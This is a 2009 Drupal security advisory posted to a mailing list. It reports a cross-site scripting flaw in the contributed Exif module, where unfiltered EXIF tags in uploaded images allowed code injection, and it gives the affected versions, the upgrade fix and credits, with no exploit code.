[Security-news] SA-CONTRIB-2009-022 - Exif - Cross Site Scripting

security-news at drupal.org security-news at drupal.org
Wed Apr 29 21:14:50 UTC 2009


  * Advisory ID: DRUPAL-SA-CONTRIB-2009-0xx
  * Project: Exif (third-party module)
  * Version: 5.x, 6.x
  * Date: 2009-April-29
  * Security risk: Moderately critical
  * Exploitable from: Remote
  * Vulnerability: Cross-site scripting

-------- DESCRIPTION  
---------------------------------------------------------

The Exif module enables users to display EXIF tags in images on the site.

EXIF tags are not properly filtered for HTML input, allowing users with
permission to upload images to inject arbitrary code into the site using a
specially crafted image. Such a cross site scripting [1] (XSS) attack may
lead to a malicious user gaining full administrative access.

-------- VERSIONS AFFECTED  
---------------------------------------------------

  * Exif 5.x-1.x prior to 5.x-1.2
  * Exif 6.x-1.x-dev prior to April 13, 2009

Drupal core is not affected. If you do not use the contributed Exif module,
there is nothing you need to do.
-------- SOLUTION  
------------------------------------------------------------

Install the latest version:
  * If you use Exif 5.x-1.x upgrade to Exif 5.x-1.2 [2].
  * Although development versions are not supported, a fix is available; If
    you use Exif 6.x-1.x-dev prior to April 13, 2009, upgrade to latest Exif
    6.x-1.x-dev [3].

See also the Exif project page [4].
-------- REPORTED BY  
---------------------------------------------------------

Jakub Suchy [5] of the Drupal security team and Michael Hess [6].
-------- FIXED BY  
------------------------------------------------------------

James Gilliland [7] and rapsli [8].
-------- CONTACT  
-------------------------------------------------------------

The security team for Drupal can be reached at security at drupal.org or via
the form at http://drupal.org/contact.

[1] http://en.wikipedia.org/wiki/Cross-site_scripting
[2] http://drupal.org/node/448862
[3] http://drupal.org/node/363274
[4] http://drupal.org/project/exif
[5] http://drupal.org/user/31977
[6] http://drupal.org/user/102818
[7] http://drupal.org/user/48673
[8] http://drupal.org/user/140802



More information about the Security-news mailing list